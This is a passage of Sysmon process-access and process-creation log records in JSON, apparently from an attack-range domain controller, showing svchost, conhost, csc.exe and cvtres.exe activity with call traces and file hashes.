07:58:59.220","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:59","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4681,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:59.220\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:59.220","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:59","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4682,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:59.220\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:59.220","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:59","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4683,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:59.220\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:59.220","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:59","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4684,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:59.220\r\nSourceProcessGUID: {41C8662E-20BF-5F25-0000-001074C30600}\r\nSourceProcessId: 5076\r\nSourceThreadId: 4416\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-20C3-5F25-0000-0010CE130700}\r\nTargetProcessId: 2860\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:59.220","SourceProcessGUID":"{41C8662E-20BF-5F25-0000-001074C30600}","SourceProcessId":"5076","SourceThreadId":"4416","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-20C3-5F25-0000-0010CE130700}","TargetProcessId":"2860","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:59","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4685,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:59.296\r\nProcessGuid: {41C8662E-20C3-5F25-0000-00105C170700}\r\nProcessId: 3908\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nFileVersion: 12.00.52519.0 built by: VSWINSERVICING\r\nDescription: Microsoft® Resource File To COFF Object Conversion Utility\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: CVTRES.EXE\r\nCommandLine: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\RES7DF1.tmp\" \"c:\\Users\\Administrator\\AppData\\Local\\Temp\\xuadk0jp\\CSCDD7883A98EA44DE6A690814D66DFF264.TMP\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20BF-5F25-0000-0020C6C20600}\r\nLogonId: 0x6C2C6\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF\r\nParentProcessGuid: {41C8662E-20C3-5F25-0000-0010CE130700}\r\nParentProcessId: 2860\r\nParentImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nParentCommandLine: \"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Administrator\\AppData\\Local\\Temp\\xuadk0jp\\xuadk0jp.cmdline\"","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:58:59.296","ProcessGuid":"{41C8662E-20C3-5F25-0000-00105C170700}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","FileVersion":"12.00.52519.0 built by: VSWINSERVICING","Description":"Microsoft® Resource File To COFF Object Conversion Utility","Product":"Microsoft® .NET Framework","Company":"Microsoft Corporation","OriginalFileName":"CVTRES.EXE","CommandLine":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\RES7DF1.tmp\" \"c:\\Users\\Administrator\\AppData\\Local\\Temp\\xuadk0jp\\CSCDD7883A98EA44DE6A690814D66DFF264.TMP\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20BF-5F25-0000-0020C6C20600}","LogonId":"0x6c2c6","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF","ParentProcessGuid":"{41C8662E-20C3-5F25-0000-0010CE130700}","ParentProcessId":"2860","ParentImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","ParentCommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Administrator\\AppData\\Local\\Temp\\xuadk0jp\\xuadk0jp.cmdline\"","EventReceivedTime":"2020-08-01 07:58:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:59","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4686,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:59.283\r\nSourceProcessGUID: {41C8662E-20C3-5F25-0000-0010CE130700}\r\nSourceProcessId: 2860\r\nSourceThreadId: 3884\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nTargetProcessGUID: {41C8662E-20C3-5F25-0000-00105C170700}\r\nTargetProcessId: 3908\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+b181|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3d58|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3ed0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3fa6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+274e|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+27a0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+28e4|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+7e38f|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+45d22|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+448ef|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+445e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+44303|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+18321|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+17b76|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+9e0d|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+1edf02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:59.283","SourceProcessGUID":"{41C8662E-20C3-5F25-0000-0010CE130700}","SourceProcessId":"2860","SourceThreadId":"3884","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","TargetProcessGUID":"{41C8662E-20C3-5F25-0000-00105C170700}","TargetProcessId":"3908","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+b181|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3d58|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3ed0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3fa6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+274e|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+27a0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+28e4|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+7e38f|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+45d22|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+448ef|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+445e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+44303|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+18321|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+17b76|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+9e0d|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+1edf02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:58:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:59","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4687,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:59.283\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20C3-5F25-0000-00105C170700}\r\nTargetProcessId: 3908\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:58:59.283","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20C3-5F25-0000-00105C170700}","TargetProcessId":"3908","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:58:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:58:59","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4688,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:58:59.283\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 